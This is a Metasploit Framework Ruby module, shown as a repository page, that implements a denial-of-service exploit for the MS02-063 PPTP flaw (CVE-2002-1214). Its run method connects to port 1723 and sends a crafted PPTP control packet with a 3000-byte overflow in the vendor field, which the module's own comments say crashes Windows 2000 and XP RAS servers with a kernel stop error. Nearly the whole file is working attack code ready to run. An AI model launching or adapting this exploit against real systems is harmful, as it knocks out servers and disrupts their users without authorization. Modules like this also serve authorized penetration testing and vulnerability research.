metasploit-framework/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb

69 lines
1.9 KiB
Ruby
Raw Normal View History

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'MS02-063 PPTP Malformed Control Data Kernel Denial of Service',
'Description' => %q{
This module exploits a kernel based overflow when sending abnormal PPTP Control Data
packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers
(Remote Access Services). Kernel memory is overwritten resulting in a BSOD.
Code execution may be possible however this module is only a DoS.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '5807' ],
[ 'CVE', '2002-1214' ],
[ 'OSVDB', '13422' ],
[ 'MSB', 'MS02-063' ],
],
'DisclosureDate' => 'Sep 26 2002'))
register_options(
[
Opt::RPORT(1723),
],self.class)
end
def run
connect
# Fields borrowed from Wireshark :)
sploit = "\x00\x9c" # length
sploit << "\x00\x01" # control message
sploit << "\x1a\x2b\x3c\x4d" # cookie
sploit << "\x00\x01" # start control connection req
sploit << "\x00\x00" # reserved
sploit << "\x01\x00" # protocol version
sploit << "\x00\x00" # reserved
sploit << "\x00\x03" # framing capabilities
sploit << "\x00\x00\x00\x02" # bearer capabilities
sploit << "\xff\xff" # max channels
sploit << "\x0a\x28" # firmware revision
sploit << "\x00\x01" # Hostname
sploit << "A" * 3000 # Vendor - trigger vuln
print_status("Sending PPTP DoS Packet...")
sock.put(sploit)
print_status("Packet sent. Kernel should halt on a Stop Error (BSOD).")
disconnect
end
2012-03-18 05:07:27 +00:00
end